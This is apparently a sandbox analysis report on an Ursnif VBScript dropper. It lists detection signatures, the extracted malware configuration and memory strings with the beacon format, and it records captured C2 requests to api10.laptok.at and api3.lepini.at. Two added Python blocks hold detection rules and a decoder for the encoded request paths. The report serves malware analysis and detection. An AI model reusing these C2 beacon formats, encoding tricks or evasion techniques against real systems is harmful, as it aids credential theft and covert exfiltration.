Analysis Report PtgzM1Gd04Up.vbs

Overview

General Information

Sample Name: PtgzM1Gd04Up.vbs
Analysis ID: 284873
MD5: 0671e735481a55031081895bf0f57760
SHA1: 11788132e8b10e6370530d68d2d562737ef1dae0
SHA256: f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd Avira: detection malicious, Label: TR/Kryptik.fklcr
Found malware configuration
Source: explorer.exe.3508.29.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.10", "version": "250155", "uptime": "275", "system": "b3683a3d0e66b42e1ff2a9f4849c6b42", "crc": "434b8", "action": "00000001", "id": "1100", "time": "1600071833", "user": "f73be0088695dc15e71ab15c4c34f37a", "soft": "1"}
Multi AV Scanner detection for domain / URL
Source: api3.lepini.at Virustotal: Detection: 6%
Source: api10.laptok.at Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Temp\ogress.psd ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: PtgzM1Gd04Up.vbs Virustotal: Detection: 19%

Source: C:\Windows\explorer.exe Code function: 29_2_04D0FD7C FindFirstFileW,FindFirstFileW
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local

Networking:

Found Tor onion address
Note: what triggers this signature is the literal substring ".onion" inside the concatenated string block quoted below (...HookExec.onionTorClientTorCrc...), together with the "tor=1" parameter name in the beacon format string. No actual .onion hostname appears anywhere in the captured strings or in the network traffic, so read this as a Tor capability indicator in the injected code, not as an observed Tor C2 address.
Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Uses nslookup.exe to query domains
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
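Three of the behaviours this report flags (the nslookup lookup of myip.opendns.com, "MSHTA Spawning Windows Shell" and "Suspicious Csc.exe Source File Folder") are cheap to catch from process-creation telemetry. The code below is an added example, not Joe Sandbox output and not the logic of the referenced Sigma rules: the rule bodies are my approximation of what those Sigma titles describe, and the events are constructed Sysmon-style records, with only the nslookup command line taken from this report.

```python
"""Process-creation detections modelled on three behaviours in this report.

Added example: rule logic approximates the cited Sigma titles and is not the
published rules; events are constructed, not sandbox output.
"""
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process


# Interpreters and LOLBins an HTML application should never need to spawn.
SHELL_CHILDREN = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\wscript.exe",
                  "\\cscript.exe", "\\regsvr32.exe", "\\rundll32.exe", "\\mshta.exe")

# User-writable locations a legitimate build would not compile from or into.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\windows\\temp\\",
                 "\\users\\public\\", "\\programdata\\")


def external_ip_lookup(ev: ProcEvent) -> bool:
    """nslookup against myip.opendns.com returns the host's public IP address;
    this is the exact command line the report shows cmd.exe launching."""
    return (ev.image.lower().endswith("\\nslookup.exe")
            and "myip.opendns.com" in ev.command_line.lower())


def mshta_spawning_shell(ev: ProcEvent) -> bool:
    """mshta.exe as parent of a shell or script interpreter."""
    return (ev.parent_image.lower().endswith("\\mshta.exe")
            and ev.image.lower().endswith(SHELL_CHILDREN))


def csc_from_user_writable_path(ev: ProcEvent) -> bool:
    """csc.exe (the C# compiler) reading or writing under a user-writable folder."""
    cl = ev.command_line.lower()
    return ev.image.lower().endswith("\\csc.exe") and any(p in cl for p in USER_WRITABLE)


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("nslookup external IP lookup", external_ip_lookup),
    ("MSHTA spawning Windows shell", mshta_spawning_shell),
    ("csc.exe source/output in suspicious folder", csc_from_user_writable_path),
]


def evaluate(events) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


# Constructed events. The first command line is from the report; the remaining
# paths and arguments are made up for illustration (the @"...cmdline" form is
# what PowerShell's Add-Type hands to csc.exe).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\nslookup.exe",
              "nslookup myip.opendns.com resolver1.opendns.com",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", "cmd /c start update.bat",
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'/noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\abcd1234\abcd1234.cmdline"',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    # Benign controls: none of these should fire.
    ProcEvent(r"C:\Windows\System32\nslookup.exe", "nslookup dc01.corp.example.internal",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"/out:C:\Projects\App\bin\App.dll C:\Projects\App\Program.cs",
              r"C:\Program Files\dotnet\MSBuild.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Only the three malicious events fire; the controls (an internal nslookup, a compiler run from a project directory, a shell opened from explorer.exe) stay quiet. Parent-child relationships are what make the mshta rule useful: the child alone, cmd.exe, is unremarkable.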
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected:
    GET /api1/4cWzoWXzIMudPPFeH/zfwY1OFNMk6A/uxIsOO9XowW/7kFoCfkfah_2BV/bjG0FzF8tkMfsfO9WibRs/z5SQzweKlMCW_2Bf/r3FHVUdIQ7_2B2F/4OggET4YVDlHnn9cEt/R_2FbmgPY/r_2B9Ijs2bxGBYWN157X/EHLvOSxdZEysAMq3hvU/MO7ssYO3b9BR2qwc73_2BM/qSiRGq20QKCka/MMWlF28y/KLXW_2BJT56aQAQ7YU8EjqN/2JsZzAR8j1/xbv8cnzdbfuDeI002/Z_0A_0Du4aCB/iVnAW6cFBzY/T9beXtW5wNqhrT/3IUVp4YjtpqX/o44VY HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /api1/ZrPM67eDMe0PJ3bd_2/FxYQ81wrj/FZQ351HtZv0VYLflOyX0/44ew0J0pAyJ2Zdt06J1/ejOutO4MWBnDs5A4maeYdF/TBoJIgwOCHRt8/zoJ_2FqC/ObYSEQUT98biFMg2p_2FLGO/Xe2sFFEt_2/BXVMVxynFtgTL14VJ/FomSQ9vCfuSu/ZDzzaPIbP4h/UGxi94rwNTQaqm/5H4Z_2BzYq0JgTNSAUiFj/AI1qd5OmqqcNF1YR/Y9f6ejd6eQItj7o/6e_2BlTQlKCx6vht_0/A_0D_2FkX/2mc9WbUuipCdNpIesLm7/AmJocubwsIxSN8THOau/P2krAXI1XX1cFN9bNtH7jO/c5jZ HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/xXyOPBhUkWhjObIGcRm4pOg/X2ghSrkPNJ/BFV3PYkVSqynhIZX0/z8cw3abh6ejc/qRsdswbWqP7/MozmpHSBnTRSly/muxskxDd4VCkj_2FZq9_2/FrmSrVCRtfsyaBuq/3Rbvb2aOOviCSur/3TAMqR4wgwK79P_2BX/um60KPfM1/n1uToq7rUKSO_2FCOBeY/jezBVFJCh_2FrZ_0A_0/DMhAHfv9uMKeCVVA7pZkld/wK9Z7iNRykPb1/EH4FQici/0vYDr4GEFcCM3JZanZOshh9/HY1 HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /api1/8C7l82RZD/IPNx_2BA6NUS8m1Meo_2/Fas2lkcyOv4_2FyXQQA/W0ZQwXgbdYzfWai3c5CkbI/em5fguyn1S8ys/vpVw9dvD/khZPTWdEQCV0N5AR0qa1YOQ/LvEPSTN_2F/zlA2gt8ynYhIMOHfr/IASIpnbuTOlg/DdcZGi8WPYI/NR3mJxPuW34_2F/az5LW_2FJU_2BFw_2FsqB/vWjp2JDa_2Fg14a2/OTYnqh9mlzVPBkV/fSy7aPAm0_2BP4YyPN/c8k0VMTpv/7Lv8jSScGYAfEur_0A_0/DYV_2Fv17qFzbgLKlQu/3u2R7Gz5WRVQ7nkvK55OrO/9i9B3_2BMh/r HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Host: api3.lepini.at
Source: global traffic HTTP traffic detected:
    GET /api1/n3L9lcGQWucW/ej8OoZYqYIS/qXKKw05yNY8m6C/sIwmpsT57_2BC61WFCPNP/yRuWmkpJOA5akf0b/bNLsbtLqpQ29JXE/GP5k1v91FymLa5DQtI/OCDbHUhQZ/fcbJOzIIFU9rJvmqoBnO/w0gRKfdB79tXuhFoLvP/d2sQ3SKwyUaMPAHzUDn1AD/_2FGn_2Bm3otg/2r86MlCl/Hj4_2F2OwjgRkb0nTVl3z6Q/0WYrmJnvEh/4MpDHwU2mFKd8OikK/_2BbtrY5iV9f/mS_0A_0Dmze/1NUYbLxCWeOqq3/MzK7cHLvfsovO5hnqCChW/oWreT_2B/ViD HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Host: api3.lepini.at
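The request paths above are not directory trees. The tokens _2B, _2F, _0A and _0D are hex escapes for '+', '/', LF and CR, and the slashes are sprinkled in afterwards, which is how ISFB/Ursnif carries base64-encoded beacon data (encrypted, according to public ISFB analyses, with Serpent in CBC mode) inside a GET path. The helper below is an added example written for this write-up; it is neither Joe Sandbox output nor code from the malware. The encoding it reverses is my reading of the observed tokens, the Serpent key needed to decrypt the result is not in this report, and the second function simply fills the beacon format string recovered from the injected code with the configuration extracted above, to show the kind of plaintext such a path carries.

```python
"""Undo the ISFB-style URL-path encoding seen in this report and render the
beacon format string with the extracted configuration.

Added example, not Joe Sandbox output and not the malware's code. The
encoding steps are an analyst interpretation of the _2B/_2F/_0A/_0D tokens.
"""
import base64
import re

# Request path copied from the first GET to api10.laptok.at above.
OBSERVED_PATH = ("/api1/4cWzoWXzIMudPPFeH/zfwY1OFNMk6A/uxIsOO9XowW/7kFoCfkfah_2BV/"
                 "bjG0FzF8tkMfsfO9WibRs/z5SQzweKlMCW_2Bf/r3FHVUdIQ7_2B2F/4OggET4YVDlHnn9cEt/"
                 "R_2FbmgPY/r_2B9Ijs2bxGBYWN157X/EHLvOSxdZEysAMq3hvU/MO7ssYO3b9BR2qwc73_2BM/"
                 "qSiRGq20QKCka/MMWlF28y/KLXW_2BJT56aQAQ7YU8EjqN/2JsZzAR8j1/xbv8cnzdbfuDeI002/"
                 "Z_0A_0Du4aCB/iVnAW6cFBzY/T9beXtW5wNqhrT/3IUVp4YjtpqX/o44VY")

# Configuration the sandbox extracted from explorer.exe memory (see above).
EXTRACTED_CONFIG = {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.10",
                    "version": "250155", "uptime": "275",
                    "system": "b3683a3d0e66b42e1ff2a9f4849c6b42", "crc": "434b8",
                    "action": "00000001", "id": "1100", "time": "1600071833",
                    "user": "f73be0088695dc15e71ab15c4c34f37a", "soft": "1"}

# Format string found in the injected code (explorer.exe, control.exe, ...).
BEACON_FMT = "soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x"

_ESCAPE = re.compile(r"_([0-9A-Fa-f]{2})")


def isfb_path_to_ciphertext(path: str, uri_prefix: str = "/api1/") -> bytes:
    """Return the raw ciphertext hidden in an ISFB-style request path.

    Assumed encoding: base64 text (with the CR/LF line breaks the Windows
    encoder inserts), every non-alphanumeric character replaced by '_' plus
    two hex digits, then '/' inserted at arbitrary positions. Decryption of
    the returned bytes needs the sample's Serpent key, which is not known here.
    """
    if path.startswith(uri_prefix):
        path = path[len(uri_prefix):]
    flat = path.replace("/", "")                                  # drop the fake separators
    b64 = _ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), flat)   # _2B -> '+', _2F -> '/', ...
    b64 = b64.replace("\r", "").replace("\n", "")                 # line breaks are not data
    b64 += "=" * (-len(b64) % 4)                                  # padding is not transmitted
    return base64.b64decode(b64, validate=True)


def isfb_style_encode(ciphertext: bytes, line_len: int = 64, split_every: int = 13) -> str:
    """Forward direction of the same transformation, written only so the
    decoder can be round-trip tested on constructed input."""
    b64 = base64.b64encode(ciphertext).decode("ascii")
    text = "\r\n".join(b64[i:i + line_len] for i in range(0, len(b64), line_len))
    escaped = "".join(c if c.isalnum() else "_%02X" % ord(c) for c in text)
    return "/api1/" + "/".join(escaped[i:i + split_every]
                               for i in range(0, len(escaped), split_every))


def render_beacon(cfg: dict) -> str:
    """Fill the memory format string with the extracted configuration.

    The 32-hex-digit 'user' value maps onto the four %08x fields. This shows
    the plaintext the format string produces; whether it is exactly what sits
    inside the observed ciphertext cannot be checked without the key.
    """
    user = cfg["user"].lower()
    if len(user) != 32 or set(user) - set("0123456789abcdef"):
        raise ValueError("user id must be 32 hex digits")
    words = tuple(int(user[i:i + 8], 16) for i in range(0, 32, 8))
    fmt = BEACON_FMT.replace("%u", "%d")                          # Python spelling of C's %u
    return fmt % ((int(cfg["soft"]), int(cfg["version"])) + words
                  + (int(cfg["server"]), int(cfg["id"]), int(cfg["crc"], 16)))


if __name__ == "__main__":
    ct = isfb_path_to_ciphertext(OBSERVED_PATH)
    print(f"{len(ct)} ciphertext bytes, 16-byte aligned: {len(ct) % 16 == 0}")
    print(render_beacon(EXTRACTED_CONFIG))
```

Run stand-alone, the script prints how many ciphertext bytes the observed path carries and whether that count is a multiple of the 16-byte block size (a CBC-mode block cipher leaves it so), followed by the rendered beacon string. The round-trip encoder exists only to test the decoder; note that it emits _0D_0A for a line break while the captured paths show _0A_0D, which is why the decoder strips both characters regardless of order.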
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml1.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5798282a,0x01d68a70</date><accdate>0x5798282a,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5798282a,0x01d68a70</date><accdate>0x5798282a,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x579c9ee9,0x01d68a70</date><accdate>0x579c9ee9,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x579c9ee9,0x01d68a70</date><accdate>0x579d62c9,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x579e3bd2,0x01d68a70</date><accdate>0x579e3bd2,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x579e3bd2,0x01d68a70</date><accdate>0x579ec4f1,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: unknown HTTP traffic detected:
    POST /api1/UIQiXLAMLg4t/Rxi8q7e6zSs/ppLkAThUDmfSS4/yOwm_2Fga2xC15DtBLwwh/NmjWIzvmns9CddET/_2BZ8hEeadvYwxh/uFd3lt60_2FyFVn_2B/iXlprICf_/2B45OhMJZjYIDjqw_2Fm/eJGvB3vDUzSSCsuPGEa/M5YE6Mv5RHrzGnZcbFsa5w/jziyOzx_2FuIu/uDOGy6Dr/GOjy4MP82vBaLdGCF5ixS2x/rbQcfTwYvE/gJjw4kL5BH7Kw6DJX/9XhSSfgVL_2B/BdxG6AZO_0A/_0Dtw28OxMea_2/Ff8pUZzLyl3SHdNWDlXEm/PFk1VIj4/S9_2B75z5/EF HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Content-Length: 2
    Host: api3.lepini.at
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sun, 13 Sep 2020 23:23:07 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: {81817910-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr, ~DFF147473DA56FBCCD.TMP.13.dr String found in binary or memory: http://api10.laptok.at/api1/4cWzoWXzIMudPPFeH/zfwY1OFNMk6A/uxIsOO9XowW/7kFoCfkfah_2BV/bjG0FzF8tkMfsf
Source: {81817912-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr String found in binary or memory: http://api10.laptok.at/api1/ZrPM67eDMe0PJ3bd_2/FxYQ81wrj/FZQ351HtZv0VYLflOyX0/44ew0J0pAyJ2Zdt06J1/ej
